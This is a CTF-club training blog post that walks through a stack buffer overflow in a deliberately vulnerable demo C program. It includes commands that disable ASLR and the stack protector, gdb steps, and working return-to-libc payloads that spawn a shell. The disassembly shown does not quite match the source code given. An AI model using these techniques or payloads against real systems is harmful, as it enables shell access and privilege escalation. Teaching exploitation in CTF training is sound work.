'sploits or having fun with the heap, stack, and format strings

As part of the weekly CTF meetings we discussed some basic stack-based, heap-based, and format-string-based exploits. For system security challenges these are bread-and-butter techniques, and they rely on a huge amount of pre-existing knowledge about operating systems, kernels, process creation, dynamic loading, C programming, stack layouts, and assembly. As it's always hard to convey all the information on the whiteboard during a live session, I thought I'd write a quick blog post to give some additional pointers and examples for the demo exploits.

You might or might not have heard that we are starting a CTF team at Purdue called b01lers. The weekly meetings are open to any Purdue student and therefore draw a very mixed crowd, from undergrads to graduate students, from first-semester technology and computer science students to crypto and system security experts in the final year of their PhD. This results in a very heterogeneous group and makes it challenging to, on one hand, keep the topic interesting for the experienced crowd and, on the other hand, not lose the new folk. To allow the CTF club to target more experienced hackers and to enable a faster bootstrapping sequence, both the ACM SIGSAC and the Forensics club presidents have agreed to help out with the training. They will take over some of the more basic tool training, allowing better and faster progress for all the clubs! Together we can make Purdue better known in the security landscape.

Stack-based vulnerability

The first example we'll discuss is a stack-based vulnerability. Individual stack frames can be super tricky and during the live demonstration I successfully talked myself into a corner and screwed up the demo (well, it kind of worked but I did not explain the layouts correctly). Assume we have the following program:

#include <stdio.h>
#include <stdlib.h>

void myfunc(char *strs[])
{
  char buf[4];
  printf("target (myfunc): last argument is at %p\n", &strs);
  /* unbounded copy of the first command-line argument: this is the bug */
  sprintf(buf, "%s", strs[1]);
  printf("we copied '%s' into the buffer\n", buf);
}

int main(int argc, char *argv[])
{
  if(argc < 2) {
    printf("usage: %s data\n", argv[0]); return 0;
  }
  printf("target: SHELL is at %p, system is at %p, exit is at %p\n", getenv("SHELL"), &system, &exit);
  myfunc(argv);
  printf("And we returned safely from our function\n");
  return 0;
}

With some C experience we see that function myfunc is susceptible to a buffer overflow. Its argument is an array of strings (argv), and strs[1], the first command-line argument, is copied into the local stack buffer without any length check (and the buffer is super small, just 4 bytes). Luckily for an attacker, the program has many information leaks and will readily tell us about interesting addresses in memory, e.g., the locations of system() and exit() in the libc and the location of the SHELL environment variable above the stack region.

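We compile this example with the stack protector disabled (the addresses shown below come from a 32-bit build, so on a 64-bit host you would additionally need -m32):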

gcc -O0 -fno-stack-protector -o stackoverflow stackoverflow.c

For the sake of reproducibility, let's disable ASLR:

sudo sysctl -w kernel.randomize_va_space=0

And when we execute "./stackoverflow fooo" we see:

target: SHELL is at 0xffffd358, system is at 0x8048480, exit is at 0x8048470
target: last argument is at 0xffffcf40
we copied 'fooo' into the buffer
And we returned safely from our function

Now if the supplied argument (fooo above) is longer than 4 bytes we have a buffer overflow and start overwriting parts of the stack that might be used for other data. Even if we copy a larger string (foo1234) the program does not crash, even though a memory safety violation happens and the buffer is overflown. It gets clearer if we look at the assembly of myfunc using objdump (objdump -d ./stackoverflow|less):

804859d:       55                      push   %ebp
804859e:       89 e5                   mov    %esp,%ebp
80485a0:       83 ec 28                sub    $0x28,%esp
80485c2:       8d 45 f4                lea    -0xc(%ebp),%eax
80485c5:       89 04 24                mov    %eax,(%esp)
80485c8:       e8 83 fe ff ff          call   8048450 <strcpy@plt>

In this code sequence we see that the C compiler opens a 0x28 byte stack frame and that the buffer buf is placed at ebp-0xc, i.e., it starts 12 bytes below the saved ebp of the prior frame. Now if we read the assembly we see that the part of the stack frame that is of interest to us is:

prior frame
saved RIP
saved EBP  <- ebp
4 byte padding
4 byte padding
buf[4]  <- ptr to buf
end of frame  <- esp

So when we write up to 4 bytes everything will be fine. If we write between 5 and 12 bytes we'll have a memory corruption and a memory safety violation but no crash (that's the dangerous area from a software development point of view, as there clearly is a bug but no crash). If we write between 13 and 16 bytes we overwrite the saved EBP: the program continues, but when returning to the caller (main in our example) the frame pointer is restored to the value the attacker supplied, usually ending in a crash. Anything beyond 16 bytes reaches the saved return instruction pointer.

Now if we want to exploit this buffer overflow we'll have to redirect the control flow to a function in libc that we can control. For this case, we use the handy system() function that executes a shell command for us.

We execute:

PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print "A"x16;'`

In this example we set a couple of things: first we set two environment variables (PS1, which controls what the prompt looks like, and SHELL, where we define what command will be executed). As we're overwriting EBP with all 'A's it will obviously crash, but we can note the locations of system, exit, and SHELL for later (in my case the values are 0x8048480 for system, 0x8048470 for exit, and 0xffffd29c for SHELL but your values might differ).

Now, let's examine the crash in a debugger:

gdb --args ./stackoverflow `perl -e 'print "A"x16;'`

If we execute the program using 'run' or 'r' we get a SIGILL due to the messed up stack frame when we return. Using 'bt' we can display the remaining stack frames and with 'frame 0' and 'info frame' we can display data on frames. If we instead supply a longer string (x20 instead of x16 above) we see that the program crashes at 0x41414141:

we copied 'AAAAAAAAAAAAAAAAAAAA' into the buffer

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Looking at the stack frames using 'bt' tells us that it's all messed up. But 0x41 is 'A' in the ASCII table, which tells us that we have some control over the return instruction pointer. We can peek around further and set some break points at interesting locations and I invite you to play around ('disas myfunc' displays the assembly of myfunc, 'break *address' stops the execution at address and lets you inspect the program state, 'c' continues, 'si' continues execution one instruction at a time).

Now if we use the information we learned above and set the return instruction pointer to system() we can supply a parameter:

PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print "A"x16 . "\x80\x84\x04\x08" . "\xf3\xc0\xfe\xc0" . "\x9c\xd2\xff\xff";'`

Here we configure the stack as follows:

prior frame            // now saved argument to system, points to SHELL
prior frame            // now the return address for system(), 0xc0fec0f3 (junk) in the example above
saved RIP              // now points to system()
saved EBP  <- ebp      // AAAA
4 byte padding         // AAAA
4 byte padding         // AAAA
buf[4]  <- ptr to buf  // AAAA
end of frame  <- esp

Now if we return from myfunc we no longer end up in main but in what looks like a legit call to system() with the address of the SHELL string as its parameter. If we execute the command above we're dropped into a shell, but if we exit that shell the original program will segfault because system() returns to the bogus address 0xc0fec0f3. If we want a clean exit we can replace that placeholder with the address of exit(), so that system() "returns" into exit():

PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print "A"x16 . "\x80\x84\x04\x08" . "\x70\x84\x04\x08" . "\x9c\xd2\xff\xff";'`

The interested reader may use execl instead of system to ensure that we don't lose SUID privileges. Some articles that you might find interesting to follow up are: